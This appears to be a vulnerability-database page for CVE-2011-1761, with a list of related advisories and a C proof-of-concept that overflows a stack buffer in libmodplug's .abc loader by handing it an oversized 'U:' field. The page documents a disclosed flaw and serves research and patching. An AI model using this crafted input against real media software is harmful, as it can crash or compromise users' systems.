Libmodplug 0.8.8.2 - '.abc' Stack Buffer Overflow (PoC)
| Reporter | Title | Published | Views | Family All 38 |
|---|---|---|---|---|
| CVE-2011-1761 | 28 Apr 201100:00 | – | circl | |
| CVE-2011-1761 | 7 Jun 201219:00 | – | cve | |
| CVE-2011-1761 | 7 Jun 201219:00 | – | cvelist | |
| [SECURITY] [DSA 2415-1] libmodplug security update | 21 Feb 201223:47 | – | debian | |
| CVE-2011-1761 | 7 Jun 201219:00 | – | debiancve | |
| Debian DSA-2415-1 : libmodplug - several vulnerabilities | 22 Feb 201200:00 | – | nessus | |
| Fedora 14 : libmodplug-0.8.8.3-3.fc14 (2011-6931) | 25 May 201100:00 | – | nessus | |
| Fedora 15 : libmodplug-0.8.8.3-3.fc15 (2011-6995) | 19 May 201100:00 | – | nessus | |
| openSUSE Security Update : libmodplug (openSUSE-SU-2011:0551-1) | 13 Jun 201400:00 | – | nessus | |
| openSUSE Security Update : libmodplug (openSUSE-SU-2011:0943-1) | 13 Jun 201400:00 | – | nessus |
10
#include <libmodplug/modplug.h>
#include <stdio.h>
#include <string.h>
/*
libmodplug <= 0.8.8.2 .abc stack-based buffer overflow poc
http://modplug-xmms.sourceforge.net/
by: epiphant
this exploits one of many overflows in load_abc.cpp lol
vlc media player uses libmodplug
greets: defrost, babi, ming_wisher, emel1a, a.v., krs
date: 28 april 2011
tested on: centos 5.6
*/
int main(void)
{
char test[512] = "X: 1\nU: ";
unsigned int i;
i = strlen(test);
while (i < 278)
test[i++] = 'Q';
test[i++] = '1' + 32;
test[i++] = '3';
test[i++] = '3';
test[i++] = '4';
while (i < 286)
test[i++] = 'A';
test[i++] = '\n';
test[i] = '\0';
strcat(test, "T: Here Without You (Transcribed by: Bungee)\n");
strcat(test, "Z: 3 Doors Down\n");
strcat(test, "L: 1/4\n");
strcat(test, "Q: 108\n");
strcat(test, "K: C\n\n");
strcat(test, "[A,3A3/4] [E9/8z3/8] A3/8 [c9/8z3/8] [A9/8z3/8] [E3/4z3/8]\n");
i = strlen(test);
ModPlug_Load(test, i);
return 0;
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
21 May 2011 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 26.8
EPSS0.11082